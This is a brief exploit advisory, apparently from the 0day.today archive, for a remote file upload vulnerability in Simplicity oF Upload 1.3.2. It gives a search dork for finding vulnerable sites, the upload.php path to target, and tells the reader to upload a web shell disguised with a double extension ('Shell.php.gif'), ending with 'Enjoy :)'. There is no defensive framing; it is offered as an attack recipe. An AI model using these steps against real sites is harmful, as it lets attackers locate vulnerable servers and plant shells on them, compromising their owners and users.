id: 10345
date: 12/20/2009
title: Simplicity oF Upload (1.3.2) Remote File Upload Vulnerability
author: Master Mind
cves: 

=============================================================
Simplicity oF Upload (1.3.2) Remote File Upload Vulnerability
=============================================================

# Exploit Title: Simplicity oF Upload (1.3.2) Remote File Upload Vulnerability
# Date: 20-12-2009
# Author: Master Mind
# Software Link: http://www.phpsimplicity.com/scripts.php?id=3
# Version: 1.3.2
# CVE : [N/A]
# Tested on: Windows 2003 Server
 
==========================================================================
Dork : Powered By: © Simplicity oF Upload
 
Exploit :
http://{target}/[script path/upload.php
 
upload you shell [Shell.php.gif]
 
Enjoy :)
 
----------------------------------------------------------------------------



#  0day.today [2023-03-24]  #